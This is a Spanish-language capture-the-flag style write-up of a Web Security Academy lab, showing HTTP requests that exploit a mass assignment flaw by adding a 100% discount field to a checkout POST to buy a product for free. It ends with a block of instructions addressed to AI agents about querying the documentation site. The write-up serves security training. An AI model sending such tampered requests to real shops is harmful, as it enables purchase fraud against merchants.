# Lab #4: Exploiting a mass assignment vulnerability Iniciamos sesion y capturamos las siguientes peticiones: ``` GET /api/checkout HTTP/2 Host: 0a3a00d003436df8847efb9500390057.web-security-academy.net Cookie: session=3XtxbilCepyAVXfEDrwszUVj0LLC8IW7 Sec-Ch-Ua-Platform: "Windows" Accept-Language: es-CO,es;q=0.9 Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Sec-Ch-Ua-Mobile: ?0 Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://0a3a00d003436df8847efb9500390057.web-security-academy.net/cart Accept-Encoding: gzip, deflate, br Priority: u=1, i ``` Lo anterior respondio: {% code overflow="wrap" %} ```json HTTP/2 200 OK Content-Type: application/json; charset=utf-8 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Length: 153 {"chosen_discount":{"percentage":0},"chosen_products":[{"product_id":"1","name":"Lightweight \"l33t\" Leather Jacket","quantity":1,"item_price":133700}]} ``` {% endcode %} Y la peticion POST se identifico asi: ``` POST /api/checkout HTTP/2 Host: 0a3a00d003436df8847efb9500390057.web-security-academy.net Cookie: session=3XtxbilCepyAVXfEDrwszUVj0LLC8IW7 Content-Length: 53 Sec-Ch-Ua-Platform: "Windows" Accept-Language: es-CO,es;q=0.9 Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: text/plain;charset=UTF-8 Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: */* Origin: https://0a3a00d003436df8847efb9500390057.web-security-academy.net Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://0a3a00d003436df8847efb9500390057.web-security-academy.net/cart Accept-Encoding: gzip, deflate, br Priority: u=1, i {"chosen_products":[{"product_id":"1","quantity":1}]} ``` Teniendo en cuenta la respuesta de la peticion GET, aƱadimos el objeto descuento en el JSON y asi comprar el producto con un 100% de descuento: {% code overflow="wrap" %} ``` POST /api/checkout HTTP/2 Host: 0a3a00d003436df8847efb9500390057.web-security-academy.net Cookie: session=3XtxbilCepyAVXfEDrwszUVj0LLC8IW7 Content-Length: 107 Sec-Ch-Ua-Platform: "Windows" Accept-Language: es-CO,es;q=0.9 Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: text/plain;charset=UTF-8 Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: */* Origin: https://0a3a00d003436df8847efb9500390057.web-security-academy.net Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://0a3a00d003436df8847efb9500390057.web-security-academy.net/cart Accept-Encoding: gzip, deflate, br Priority: u=1, i {"chosen_discount":{"percentage":100},"chosen_products":[{"product_id":"1","quantity":1}]} ``` {% endcode %} Y lo anterior responde asi: ``` HTTP/2 201 Created Location: /cart/order-confirmation?order-confirmed=true X-Frame-Options: SAMEORIGIN Content-Length: 0 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://books.spartan-cybersec.com/web/api-testing/lab-4-exploiting-a-mass-assignment-vulnerability.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.